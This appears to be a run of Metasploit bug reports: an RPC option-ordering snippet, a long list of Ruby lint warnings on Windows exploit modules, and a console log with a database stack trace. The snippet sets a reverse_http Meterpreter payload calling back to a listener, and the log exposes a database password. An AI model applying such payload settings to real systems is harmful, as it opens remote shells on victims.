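PAYLOAD_MIDDLE = [['LPORT', 8080], ['PAYLOAD', 'java/meterpreter/reverse_http'],
                  ['SRVHOST', '0.0.0.0'], ['SRVPORT', 8080], ['LHOST', '192.168.1.2']].freeze
PAYLOAD_LAST = [['LPORT', 8080], ['SRVHOST', '0.0.0.0'], ['LHOST', '192.168.1.2'],
                ['SRVPORT', 8080], ['PAYLOAD', 'java/meterpreter/reverse_http']].freeze

middle = decode_call(build_call(TOKEN, PAYLOAD_MIDDLE))
last = decode_call(build_call(TOKEN, PAYLOAD_LAST))
puts "key order, first request:  #{middle[4].keys.join(', ')}"
puts "key order, second request: #{last[4].keys.join(', ')}"
puts "identical once decoded:    #{middle == last}"
```

Both bodies come out at 187 bytes, matching the Content-Length in the captured requests, and decode to equal Ruby hashes, so a consumer that behaves differently for the two is depending on key order or on something outside the serialized options.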

Bajillion warnings with "ruby -c -w"

modules/exploits/windows/antivirus/ams_hndlrsvc.rb:61: warning: assigned but unused variable - exe_fname
modules/exploits/windows/antivirus/ams_hndlrsvc.rb:171: warning: mismatched indentations at 'end' with 'case' at 166
modules/exploits/windows/antivirus/ams_xfr.rb:62: warning: assigned but unused variable - exe_fname
modules/exploits/windows/antivirus/ams_xfr.rb:112: warning: mismatched indentations at 'end' with 'case' at 107
modules/exploits/windows/backupexec/remote_agent.rb:97: warning: assigned but unused variable - resp
modules/exploits/windows/brightstor/mediasrv_sunrpc.rb:279: warning: assigned but unused variable - ret
modules/exploits/windows/browser/adobe_cooltype_sing.rb:320: warning: assigned but unused variable - var_start
modules/exploits/windows/browser/adobe_flash_otf_font.rb:318: warning: shadowing outer local variable - cli
modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb:215: warning: assigned but unused variable - var_start
modules/exploits/windows/browser/adobe_flash_rtmp.rb:283: warning: assigned but unused variable - c0
modules/exploits/windows/browser/adobe_flash_rtmp.rb:293: warning: assigned but unused variable - c2
modules/exploits/windows/browser/adobe_flash_sps.rb:149: warning: assigned but unused variable - myhost
modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb:92: warning: assigned but unused variable - p
modules/exploits/windows/browser/adobe_geticon.rb:82: warning: assigned but unused variable - p
modules/exploits/windows/browser/adobe_jbig2decode.rb:73: warning: assigned but unused variable - p
modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb:78: warning: assigned but unused variable - p
modules/exploits/windows/browser/adobe_utilprintf.rb:64: warning: assigned but unused variable - p
modules/exploits/windows/browser/amaya_bdo.rb:60: warning: assigned but unused variable - p
modules/exploits/windows/browser/aol_ampx_convertfile.rb:70: warning: assigned but unused variable - p
modules/exploits/windows/browser/apple_itunes_playlist.rb:63: warning: assigned but unused variable - p
modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb:101: warning: assigned but unused variable - shellcode
modules/exploits/windows/browser/apple_quicktime_smil_debug.rb:123: warning: assigned but unused variable - shellcode
modules/exploits/windows/browser/ask_shortformat.rb:68: warning: assigned but unused variable - p
modules/exploits/windows/browser/athocgov_completeinstallation.rb:68: warning: assigned but unused variable - p
modules/exploits/windows/browser/autodesk_idrop.rb:71: warning: assigned but unused variable - p
modules/exploits/windows/browser/aventail_epi_activex.rb:94: warning: assigned but unused variable - progid
modules/exploits/windows/browser/aventail_epi_activex.rb:123: warning: assigned but unused variable - j_ret
modules/exploits/windows/browser/awingsoft_web3d_bof.rb:87: warning: assigned but unused variable - p
modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb:72: warning: assigned but unused variable - p
modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb:75: warning: assigned but unused variable - clsid
modules/exploits/windows/browser/barcode_ax49.rb:66: warning: assigned but unused variable - p
modules/exploits/windows/browser/ca_brightstor_addcolumn.rb:63: warning: assigned but unused variable - p
modules/exploits/windows/browser/ca_brightstor_addcolumn.rb:69: warning: assigned but unused variable - nops
modules/exploits/windows/browser/citrix_gateway_actx.rb:193: warning: shadowing outer local variable - cli
modules/exploits/windows/browser/citrix_gateway_actx.rb:133: warning: assigned but unused variable - p
modules/exploits/windows/browser/creative_software_cachefolder.rb:63: warning: assigned but unused variable - p
modules/exploits/windows/browser/ea_checkrequirements.rb:64: warning: assigned but unused variable - p
modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb:65: warning: assigned but unused variable - p
modules/exploits/windows/browser/facebook_extractiptc.rb:67: warning: assigned but unused variable - p
modules/exploits/windows/browser/hpmqc_progcolor.rb:69: warning: assigned but unused variable - p
modules/exploits/windows/browser/hyleos_chemviewx_activex.rb:74: warning: assigned but unused variable - progid
modules/exploits/windows/browser/ibmegath_getxmlvalue.rb:65: warning: assigned but unused variable - p
modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb:67: warning: assigned but unused variable - p
modules/exploits/windows/browser/ie_execcommand_uaf.rb:262: warning: assigned but unused variable - js
modules/exploits/windows/browser/ie_iscomponentinstalled.rb:57: warning: assigned but unused variable - p
modules/exploits/windows/browser/ie_unsafe_scripting.rb:84: warning: assigned but unused variable - var_stream
modules/exploits/windows/browser/java_basicservice_impl.rb:134: warning: assigned but unused variable - buf
modules/exploits/windows/browser/java_codebase_trust.rb:139: warning: assigned but unused variable - p
modules/exploits/windows/browser/java_docbase_bof.rb:97: warning: assigned but unused variable - p
modules/exploits/windows/browser/java_ws_arginject_altjvm.rb:128: warning: (...) interpreted as grouped expression
modules/exploits/windows/browser/java_ws_vmargs.rb:125: warning: (...) interpreted as grouped expression
modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb:62: warning: assigned but unused variable - p
modules/exploits/windows/browser/kazaa_altnet_heap.rb:65: warning: assigned but unused variable - p
modules/exploits/windows/browser/lpviewer_url.rb:64: warning: assigned but unused variable - p
modules/exploits/windows/browser/mirc_irc_url.rb:63: warning: assigned but unused variable - p
modules/exploits/windows/browser/mozilla_attribchildremoved.rb:246: warning: assigned but unused variable - p
modules/exploits/windows/browser/mozilla_attribchildremoved.rb:250: warning: assigned but unused variable - ffversion
modules/exploits/windows/browser/mozilla_attribchildremoved.rb:251: warning: assigned but unused variable - osversion
modules/exploits/windows/browser/mozilla_nssvgvalue.rb:158: warning: assigned but unused variable - p
modules/exploits/windows/browser/mozilla_nssvgvalue.rb:162: warning: assigned but unused variable - ffversion
modules/exploits/windows/browser/mozilla_nssvgvalue.rb:163: warning: assigned but unused variable - osversion
modules/exploits/windows/browser/mozilla_nssvgvalue.rb:183: warning: assigned but unused variable - target
modules/exploits/windows/browser/mozilla_nstreerange.rb:147: warning: assigned but unused variable - spray_size
modules/exploits/windows/browser/mozilla_reduceright.rb:96: warning: character class has duplicated range: /Firefox\/3\.6\.[16|17]/
modules/exploits/windows/browser/ms06_013_createtextrange.rb:72: warning: assigned but unused variable - p
modules/exploits/windows/browser/ms06_013_createtextrange.rb:81: warning: assigned but unused variable - xmlns
modules/exploits/windows/browser/ms06_055_vml_method.rb:61: warning: assigned but unused variable - p
modules/exploits/windows/browser/ms06_057_webview_setslice.rb:59: warning: assigned but unused variable - p
modules/exploits/windows/browser/ms06_071_xml_core.rb:59: warning: assigned but unused variable - p
modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb:359: warning: assigned but unused variable - buf
modules/exploits/windows/browser/ms08_053_mediaencoder.rb:65: warning: assigned but unused variable - p
modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb:71: warning: assigned but unused variable - p
modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb:80: warning: assigned but unused variable - vname
modules/exploits/windows/browser/ms08_078_xml_corruption.rb:104: warning: assigned but unused variable - trash
modules/exploits/windows/browser/ms09_002_memory_corruption.rb:86: warning: assigned but unused variable - p
modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb:111: warning: assigned but unused variable - p
modules/exploits/windows/browser/ms09_072_style_object.rb:97: warning: assigned but unused variable - var_start
modules/exploits/windows/browser/ms10_002_aurora.rb:116: warning: assigned but unused variable - rand_html
modules/exploits/windows/browser/ms10_018_ie_behaviors.rb:158: warning: assigned but unused variable - p
modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb:74: warning: assigned but unused variable - p
modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb:79: warning: assigned but unused variable - shellcode
modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb:123: warning: (...) interpreted as grouped expression
modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb:199: warning: assigned but unused variable - js_net_dll
modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb:86: warning: (...) interpreted as grouped expression
modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb:95: warning: assigned but unused variable - webdav
modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb:128: warning: assigned but unused variable - headers
modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb:150: warning: assigned but unused variable - my_uri
modules/exploits/windows/browser/ms10_090_ie_css_clip.rb:161: warning: assigned but unused variable - p
modules/exploits/windows/browser/ms11_003_ie_css_import.rb:218: warning: assigned but unused variable - ret
modules/exploits/windows/browser/msvidctl_mpeg2.rb:111: warning: assigned but unused variable - p
modules/exploits/windows/browser/msvidctl_mpeg2.rb:114: warning: assigned but unused variable - allclsids
modules/exploits/windows/browser/mswhale_checkforupdates.rb:65: warning: assigned but unused variable - p
modules/exploits/windows/browser/nis2004_antispam.rb:65: warning: assigned but unused variable - p
modules/exploits/windows/browser/novelliprint_callbackurl.rb:95: warning: assigned but unused variable - p
modules/exploits/windows/browser/novelliprint_callbackurl.rb:106: warning: assigned but unused variable - offset
modules/exploits/windows/browser/novelliprint_callbackurl.rb:115: warning: assigned but unused variable - j_ret
modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb:94: warning: assigned but unused variable - p
modules/exploits/windows/browser/novelliprint_executerequest.rb:64: warning: assigned but unused variable - p
modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb:76: warning: assigned but unused variable - p
modules/exploits/windows/browser/novelliprint_getdriversettings.rb:65: warning: assigned but unused variable - p
modules/exploits/windows/browser/oracle_dc_submittoexpress.rb:71: warning: assigned but unused variable - p
modules/exploits/windows/browser/oracle_dc_submittoexpress.rb:74: warning: assigned but unused variable - fluff
modules/exploits/windows/browser/pcvue_func.rb:98: warning: assigned but unused variable - j_ret
modules/exploits/windows/browser/realplayer_cdda_uri.rb:65: warning: assigned but unused variable - p
modules/exploits/windows/browser/realplayer_console.rb:67: warning: assigned but unused variable - p
modules/exploits/windows/browser/realplayer_import.rb:67: warning: assigned but unused variable - p
modules/exploits/windows/browser/realplayer_smil.rb:64: warning: assigned but unused variable - p
modules/exploits/windows/browser/roxio_cineplayer.rb:66: warning: assigned but unused variable - p
modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb:65: warning: assigned but unused variable - p
modules/exploits/windows/browser/softartisans_getdrivename.rb:65: warning: assigned but unused variable - p
modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb:71: warning: assigned but unused variable - p
modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb:68: warning: assigned but unused variable - p
modules/exploits/windows/browser/trendmicro_extsetowner.rb:94: warning: assigned but unused variable - p
modules/exploits/windows/browser/trendmicro_extsetowner.rb:112: warning: assigned but unused variable - j_ret
modules/exploits/windows/browser/tumbleweed_filetransfer.rb:63: warning: assigned but unused variable - p
modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb:115: warning: assigned but unused variable - type
modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb:134: warning: assigned but unused variable - webdav
modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb:199: warning: assigned but unused variable - my_uri
modules/exploits/windows/browser/ultraoffice_httpupload.rb:78: warning: assigned but unused variable - clsid
modules/exploits/windows/browser/verypdf_pdfview.rb:65: warning: assigned but unused variable - p
modules/exploits/windows/browser/verypdf_pdfview.rb:71: warning: assigned but unused variable - nops
modules/exploits/windows/browser/webdav_dll_hijacker.rb:96: warning: assigned but unused variable - webdav
modules/exploits/windows/browser/webdav_dll_hijacker.rb:161: warning: assigned but unused variable - my_uri
modules/exploits/windows/browser/webex_ucf_newobject.rb:92: warning: assigned but unused variable - clsid
modules/exploits/windows/browser/winamp_ultravox.rb:62: warning: assigned but unused variable - p
modules/exploits/windows/browser/winamp_ultravox.rb:64: warning: assigned but unused variable - res
modules/exploits/windows/browser/windvd7_applicationtype.rb:61: warning: assigned but unused variable - p
modules/exploits/windows/browser/winzip_fileview.rb:76: warning: assigned but unused variable - p
modules/exploits/windows/browser/wmi_admintools.rb:137: warning: assigned but unused variable - pivot_str
modules/exploits/windows/browser/wmi_admintools.rb:155: warning: assigned but unused variable - shellcode
modules/exploits/windows/browser/wmi_admintools.rb:156: warning: assigned but unused variable - nops
modules/exploits/windows/browser/wmi_admintools.rb:161: warning: assigned but unused variable - progid
modules/exploits/windows/browser/xmplay_asx.rb:62: warning: assigned but unused variable - p
modules/exploits/windows/dcerpc/ms05_017_msmq.rb:120: warning: assigned but unused variable - queue_plen
modules/exploits/windows/dcerpc/ms05_017_msmq.rb:141: warning: assigned but unused variable - response
modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb:279: warning: assigned but unused variable - response
modules/exploits/windows/dcerpc/ms07_065_msmq.rb:135: warning: assigned but unused variable - response
modules/exploits/windows/driver/netgear_wg111_beacon.rb:144: warning: assigned but unused variable - ret
modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb:145: warning: assigned but unused variable - name
modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb:156: warning: assigned but unused variable - mytargs
modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb:325: warning: assigned but unused variable - buf
modules/exploits/windows/email/ms10_045_outlook_ref_only.rb:112: warning: assigned but unused variable - webdav
modules/exploits/windows/email/ms10_045_outlook_ref_only.rb:134: warning: assigned but unused variable - headers
modules/exploits/windows/email/ms10_045_outlook_ref_only.rb:156: warning: assigned but unused variable - my_uri
modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb:110: warning: assigned but unused variable - webdav
modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb:132: warning: assigned but unused variable - headers
modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb:154: warning: assigned but unused variable - my_uri
modules/exploits/windows/fileformat/adobe_cooltype_sing.rb:307: warning: assigned but unused variable - var_start
modules/exploits/windows/fileformat/adobe_flashplayer_button.rb:221: warning: assigned but unused variable - var_start
modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb:217: warning: assigned but unused variable - var_start
modules/exploits/windows/fileformat/adobe_jbig2decode.rb:67: warning: mismatched indentations at 'end' with 'def' at 20
modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb:207: warning: assigned but unused variable - open_action
modules/exploits/windows/fileformat/adobe_reader_u3d.rb:582: warning: `%' after local variable is interpreted as binary operator
modules/exploits/windows/fileformat/adobe_reader_u3d.rb:582: warning: even though it seems like string literal
modules/exploits/windows/fileformat/adobe_reader_u3d.rb:601: warning: `%' after local variable is interpreted as binary operator
modules/exploits/windows/fileformat/adobe_reader_u3d.rb:601: warning: even though it seems like string literal
modules/exploits/windows/fileformat/adobe_reader_u3d.rb:610: warning: `%' after local variable is interpreted as binary operator
modules/exploits/windows/fileformat/adobe_reader_u3d.rb:610: warning: even though it seems like string literal
modules/exploits/windows/fileformat/adobe_reader_u3d.rb:625: warning: `%' after local variable is interpreted as binary operator
modules/exploits/windows/fileformat/adobe_reader_u3d.rb:625: warning: even though it seems like string literal
modules/exploits/windows/fileformat/adobe_reader_u3d.rb:540: warning: assigned but unused variable - site
modules/exploits/windows/fileformat/foxit_reader_filewrite.rb:86: warning: assigned but unused variable - file
modules/exploits/windows/fileformat/mcafee_showreport_exec.rb:129: warning: assigned but unused variable - my_uri
modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb:61: warning: assigned but unused variable - file_name
modules/exploits/windows/firewall/blackice_pam_icq.rb:44: warning: `-' after local variable is interpreted as binary operator
modules/exploits/windows/firewall/blackice_pam_icq.rb:44: warning: even though it seems like unary operator
modules/exploits/windows/firewall/blackice_pam_icq.rb:44: warning: `-' after local variable is interpreted as binary operator
modules/exploits/windows/firewall/blackice_pam_icq.rb:44: warning: even though it seems like unary operator
modules/exploits/windows/ftp/ability_server_stor.rb:78: warning: mismatched indentations at 'end' with 'def' at 15
modules/exploits/windows/ftp/leapftp_pasv_reply.rb:66: warning: assigned but unused variable - p
modules/exploits/windows/ftp/odin_list_reply.rb:90: warning: assigned but unused variable - nops
modules/exploits/windows/ftp/proftp_banner.rb:60: warning: assigned but unused variable - p
modules/exploits/windows/ftp/trellian_client_pasv.rb:63: warning: assigned but unused variable - p
modules/exploits/windows/ftp/xftp_client_pwd.rb:63: warning: assigned but unused variable - p
modules/exploits/windows/ftp/xlink_client.rb:65: warning: assigned but unused variable - p
modules/exploits/windows/http/adobe_robohelper_authbypass.rb:89: warning: assigned but unused variable - data
modules/exploits/windows/http/altn_securitygateway.rb:126: warning: assigned but unused variable - res
modules/exploits/windows/http/belkin_bulldog.rb:59: warning: assigned but unused variable - c
modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb:63: warning: assigned but unused variable - exe_fname
modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb:114: warning: mismatched indentations at 'end' with 'if' at 110
modules/exploits/windows/http/edirectory_imonitor.rb:74: warning: assigned but unused variable - res
modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb:79: warning: assigned but unused variable - start
modules/exploits/windows/http/hp_power_manager_filename.rb:99: warning: `%' after local variable is interpreted as binary operator
modules/exploits/windows/http/hp_power_manager_filename.rb:99: warning: even though it seems like string literal
modules/exploits/windows/http/hp_power_manager_filename.rb:100: warning: `%' after local variable is interpreted as binary operator
modules/exploits/windows/http/hp_power_manager_filename.rb:100: warning: even though it seems like string literal
modules/exploits/windows/http/hp_power_manager_filename.rb:102: warning: `%' after local variable is interpreted as binary operator
modules/exploits/windows/http/hp_power_manager_filename.rb:102: warning: even though it seems like string literal
modules/exploits/windows/http/hp_power_manager_filename.rb:103: warning: `%' after local variable is interpreted as binary operator
modules/exploits/windows/http/hp_power_manager_filename.rb:103: warning: even though it seems like string literal
modules/exploits/windows/http/hp_power_manager_filename.rb:92: warning: assigned but unused variable - request
modules/exploits/windows/http/hp_power_manager_login.rb:73: warning: assigned but unused variable - req
modules/exploits/windows/http/httpdx_handlepeer.rb:124: warning: assigned but unused variable - res
modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb:84: warning: assigned but unused variable - res
modules/exploits/windows/http/ibm_tpmfosd_overflow.rb:220: warning: assigned but unused variable - res
modules/exploits/windows/http/ipswitch_wug_maincfgret.rb:66: warning: assigned but unused variable - c
modules/exploits/windows/http/ipswitch_wug_maincfgret.rb:77: warning: assigned but unused variable - res
modules/exploits/windows/http/nowsms.rb:59: warning: assigned but unused variable - c
modules/exploits/windows/http/nowsms.rb:65: warning: assigned but unused variable - res
modules/exploits/windows/http/osb_uname_jlist.rb:63: warning: assigned but unused variable - exe_fname
modules/exploits/windows/http/sambar6_search_results.rb:96: warning: `<<' after local variable is interpreted as binary operator
modules/exploits/windows/http/sambar6_search_results.rb:96: warning: even though it seems like here document
modules/exploits/windows/http/sapdb_webtools.rb:75: warning: assigned but unused variable - res
modules/exploits/windows/http/sybase_easerver.rb:77: warning: assigned but unused variable - res
modules/exploits/windows/http/sysax_create_folder.rb:186: warning: assigned but unused variable - r
modules/exploits/windows/http/trackercam_phparg_overflow.rb:90: warning: assigned but unused variable - c
modules/exploits/windows/http/trackercam_phparg_overflow.rb:97: warning: assigned but unused variable - res
modules/exploits/windows/http/trendmicro_officescan.rb:96: warning: assigned but unused variable - len
modules/exploits/windows/http/trendmicro_officescan.rb:100: warning: assigned but unused variable - res
modules/exploits/windows/http/xampp_webdav_upload_php.rb:54: warning: assigned but unused variable - c
modules/exploits/windows/iis/ms02_065_msadc.rb:92: warning: assigned but unused variable - res
modules/exploits/windows/iis/msadc.rb:126: warning: `+' after local variable is interpreted as binary operator
modules/exploits/windows/iis/msadc.rb:126: warning: even though it seems like unary operator
modules/exploits/windows/iis/msadc.rb:199: warning: `+' after local variable is interpreted as binary operator
modules/exploits/windows/iis/msadc.rb:199: warning: even though it seems like unary operator
modules/exploits/windows/iis/msadc.rb:409: warning: assigned but unused variable - res
modules/exploits/windows/imap/eudora_list.rb:84: warning: assigned but unused variable - build
modules/exploits/windows/isapi/ms00_094_pbserver.rb:81: warning: assigned but unused variable - res
modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb:94: warning: assigned but unused variable - res
modules/exploits/windows/isapi/rsa_webagent_redirect.rb:95: warning: assigned but unused variable - r
modules/exploits/windows/isapi/w3who_query.rb:118: warning: assigned but unused variable - r
modules/exploits/windows/license/calicserv_getconfig.rb:78: warning: assigned but unused variable - banner
modules/exploits/windows/license/flexnet_lmgrd_bof.rb:181: warning: assigned but unused variable - t
modules/exploits/windows/local/ms10_092_schelevator.rb:99: warning: assigned but unused variable - upload_fn
modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb:61: warning: assigned but unused variable - p
modules/exploits/windows/misc/eureka_mail_err.rb:75: warning: assigned but unused variable - p
modules/exploits/windows/misc/fb_svc_attach.rb:81: warning: assigned but unused variable - op_attach
modules/exploits/windows/misc/fb_svc_attach.rb:84: warning: assigned but unused variable - op_create
modules/exploits/windows/misc/ibm_tsm_cad_ping.rb:91: warning: assigned but unused variable - buf
modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb:107: warning: assigned but unused variable - rca_port
modules/exploits/windows/misc/ib_svc_attach.rb:126: warning: assigned but unused variable - op_attach
modules/exploits/windows/misc/ib_svc_attach.rb:129: warning: assigned but unused variable - op_create
modules/exploits/windows/misc/mirc_privmsg_server.rb:69: warning: assigned but unused variable - p
modules/exploits/windows/misc/ms07_064_sami.rb:57: warning: assigned but unused variable - p
modules/exploits/windows/misc/poppeeper_date.rb:70: warning: assigned but unused variable - p
modules/exploits/windows/misc/poppeeper_uidl.rb:70: warning: assigned but unused variable - p
modules/exploits/windows/misc/realtek_playlist.rb:63: warning: assigned but unused variable - p
modules/exploits/windows/misc/talkative_response.rb:67: warning: assigned but unused variable - p
modules/exploits/windows/misc/ufo_ai.rb:62: warning: assigned but unused variable - p
modules/exploits/windows/misc/wireshark_lua.rb:134: warning: assigned but unused variable - my_uri
modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb:266: warning: (...) interpreted as grouped expression
modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb:440: warning: assigned but unused variable - idx
modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb:268: warning: (...) interpreted as grouped expression
modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb:440: warning: assigned but unused variable - idx
modules/exploits/windows/mysql/scrutinizer_upload_exec.rb:187: warning: assigned but unused variable - res
modules/exploits/windows/nntp/ms05_030_nntp.rb:71: warning: assigned but unused variable - p
modules/exploits/windows/novell/groupwisemessenger_client.rb:65: warning: assigned but unused variable - p
modules/exploits/windows/novell/groupwisemessenger_client.rb:72: warning: assigned but unused variable - rand_3
modules/exploits/windows/novell/zenworks_desktop_agent.rb:79: warning: assigned but unused variable - ack
modules/exploits/windows/postgres/postgres_payload.rb:113: warning: assigned but unused variable - msg
modules/exploits/windows/scada/igss9_misc.rb:159: warning: assigned but unused variable - res
modules/exploits/windows/scada/moxa_mdmtool.rb:65: warning: assigned but unused variable - p
modules/exploits/windows/smb/ms04_011_lsass.rb:149: warning: assigned but unused variable - response
modules/exploits/windows/smb/ms04_031_netdde.rb:91: warning: assigned but unused variable - response
modules/exploits/windows/smb/ms07_029_msdns_zonename.rb:262: warning: assigned but unused variable - response
modules/exploits/windows/smb/ms08_067_netapi.rb:1135: warning: assigned but unused variable - module_name
modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb:138: warning: assigned but unused variable - e
modules/exploits/windows/smb/ms10_061_spoolss.rb:125: warning: assigned but unused variable - scomm
modules/exploits/windows/smb/ms10_061_spoolss.rb:79: warning: assigned but unused variable - login_time
modules/exploits/windows/smb/ms10_061_spoolss.rb:108: warning: assigned but unused variable - lerror
modules/exploits/windows/smb/ms10_061_spoolss.rb:108: warning: assigned but unused variable - lcount
modules/exploits/windows/smb/ms10_061_spoolss.rb:278: warning: assigned but unused variable - response
modules/exploits/windows/smb/ms10_061_spoolss.rb:344: warning: assigned but unused variable - response
modules/exploits/windows/smb/ms10_061_spoolss.rb:376: warning: assigned but unused variable - response
modules/exploits/windows/smb/ms10_061_spoolss.rb:398: warning: assigned but unused variable - response
modules/exploits/windows/smb/ms10_061_spoolss.rb:420: warning: assigned but unused variable - response
modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb:94: warning: assigned but unused variable - trans2
modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb:120: warning: assigned but unused variable - heap_pointer_leaked
modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb:162: warning: assigned but unused variable - trans2
modules/exploits/windows/smb/smb_relay.rb:318: warning: assigned but unused variable - dcerpc
modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb:89: warning: assigned but unused variable - trans2
modules/exploits/windows/ssh/securecrt_ssh1.rb:64: warning: assigned but unused variable - p
modules/exploits/windows/ssl/ms04_011_pct.rb:142: warning: assigned but unused variable - greeting
modules/exploits/windows/tftp/distinct_tftp_traversal.rb:75: warning: assigned but unused variable - ret
modules/exploits/windows/tftp/netdecision_tftp_traversal.rb:75: warning: assigned but unused variable - ret
modules/exploits/windows/tftp/tftpserver_wrq_bof.rb:90: warning: `+' after local variable is interpreted as binary operator
modules/exploits/windows/tftp/tftpserver_wrq_bof.rb:90: warning: even though it seems like unary operator
modules/exploits/windows/vnc/realvnc_client.rb:68: warning: assigned but unused variable - p
modules/exploits/windows/vnc/ultravnc_client.rb:69: warning: assigned but unused variable - p
modules/exploits/windows/vnc/ultravnc_viewer_bof.rb:62: warning: assigned but unused variable - p
modules/exploits/windows/vnc/winvnc_http_get.rb:70: warning: assigned but unused variable - res
modules/exploits/windows/vnc/winvnc_http_get.rb:79: warning: mismatched indentations at 'end' with 'class' at 15

msfpro console search can not search modules

[root@devel ~]# service metasploit status;msfpro
metasploit is running
postgresql already running
prosvc is running
nginx is running
[*] Please wait while the Metasploit Pro Console initializes...

[*] Starting Metasploit Console...

       =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 889 exploits - 516 auxiliary - 152 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops

[*] Successfully loaded plugin: pro
msf > search jboss

msf > exit
[root@devel ~]# service metasploit stop;msfpro
metasploit is stopped
LOG: unexpected EOF on client connection
LOG: unexpected EOF on client connection
LOG: unexpected EOF on client connection
LOG: unexpected EOF on client connection
prosvc is stopped
nginx is stopped
LOG: received smart shutdown request
LOG: autovacuum launcher shutting down
LOG: shutting down
LOG: database system is shut down
/opt/metasploit-4.3.0/postgresql/scripts/ctl.sh : postgresql stopped
[*] Please wait while the Metasploit Pro Console initializes...

[*] Starting Metasploit Console...
[-] Failed to connect to the database: could not connect to server: Connection refused
Is the server running on host "localhost" (::1) and accepting
TCP/IP connections on port 7337?
could not connect to server: Connection refused
Is the server running on host "localhost" (127.0.0.1) and accepting
TCP/IP connections on port 7337?
{"adapter"=>"postgresql", "database"=>"msf3", "username"=>"msf3", "password"=>"fd401d58", "port"=>7337, "host"=>"localhost", "pool"=>256, "timeout"=>5}
["/opt/metasploit-4.3.0/apps/pro/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.2/lib/active_record/connection_adapters/postgresql_adapter.rb:1194:in `initialize'",
"/opt/metasploit-4.3.0/apps/pro/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.2/lib/active_record/connection_adapters/postgresql_adapter.rb:1194:in `new'",
"/opt/metasploit-4.3.0/apps/pro/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.2/lib/active_record/connection_adapters/postgresql_adapter.rb:1194:in `connect'",
"/opt/metasploit-4.3.0/apps/pro/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.2/lib/active_record/connection_adapters/postgresql_adapter.rb:329:in `initialize'",
"/opt/metasploit-4.3.0/apps/pro/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.2/lib/active_record/connection_adapters/postgresql_adapter.rb:28:in `new'",
"/opt/metasploit-4.3.0/apps/pro/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.2/lib/active_record/connection_adapters/postgresql_adapter.rb:28:in `postgresql_connection'",
"/opt/metasploit-4.3.0/apps/pro/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.2/lib/active_record/connection_adapters/abstract/connection_pool.rb:277:in `new_connection'",
"/opt/metasploit-4.3.0/apps/pro/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.2/lib/active_record/connection_adapters/abstract/connection_pool.rb:287:in `checkout_new_connection'",
"/opt/metasploit-4.3.0/apps/pro/msf3/lib/msf/core/patches/active_record.rb:58:in `block (2 levels) in checkout'",
"/opt/metasploit-4.3.0/ruby/lib/ruby/1.9.1/monitor.rb:211:in `mon_synchronize'",
"/opt/metasploit-4.3.0/apps/pro/msf3/lib/msf/core/patches/active_record.rb:53:in `block in checkout'",
"/opt/metasploit-4.3.0/apps/pro/msf3/lib/msf/core/patches/active_record.rb:52:in `loop'",
"/opt/metasploit-4.3.0/apps/pro/msf3/lib/msf/core/patches/active_record.rb:52:in `checkout'",
